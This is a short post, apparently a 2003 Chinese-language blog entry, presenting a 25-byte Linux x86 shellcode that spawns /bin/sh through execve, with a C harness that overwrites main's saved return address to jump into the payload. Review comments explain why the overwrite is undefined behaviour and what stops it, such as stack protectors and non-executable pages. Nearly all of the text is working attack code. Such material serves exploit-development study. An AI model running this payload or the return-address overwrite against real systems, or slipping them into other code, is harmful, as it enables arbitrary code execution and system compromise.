根据昨天写的BSD shellcode的思想,今天写了一个Linux上的Shellcode。

/*
 * Shellcode for Linux
 * execve /bin/sh
 * by matthew
 * Apr 12 2003
 *
 * 25 bytes.
 *
 *    __@
 *  _ \<_
 * (_)/(_) matthew@arbornet.org
 *
 */

char shellcode[] =
"\x31\xc0"
"\x50"
"\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x89\xe2"
"\xb0\x0b"
"\xcd\x80";

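/*
 * Test harness: prints the payload length, then stores the address of
 * shellcode[] into the int-sized stack slot two positions above the local
 * `ret`.
 *
 * NOTE(review): that store is undefined behaviour in C. It only has the
 * intended effect if the compiler lays out main's frame so that the slot at
 * (int *)&ret + 2 holds the saved return address -- presumably the classic
 * 32-bit x86 layout the author built on; confirm for any other toolchain.
 * A stack protector, a different frame layout, or non-executable data pages
 * each stop it from transferring control, and where pointers are wider than
 * int the (int) cast truncates the address.
 *
 * NOTE(review): printf and strlen are declared in <stdio.h> and <string.h>;
 * the listing shows no #include lines, so the calls rely on implicit
 * declarations unless the headers are added at the top of the file.
 */
int
main()
{
    int ret;

    /*
     * strlen() yields size_t while "%d" expects int; the explicit cast keeps
     * the format string and its argument in agreement on every ABI. The
     * value is small (the payload has no embedded NUL and is 25 bytes long).
     */
    printf("Shellcode Length = %d\n", (int)strlen(shellcode));

    /* Deliberate out-of-bounds write above `ret`; see the header comment. */
    (*((int *)&ret +2 ))=(int)shellcode;

    /* Reached only if the write above did not redirect the return. */
    return 0;
}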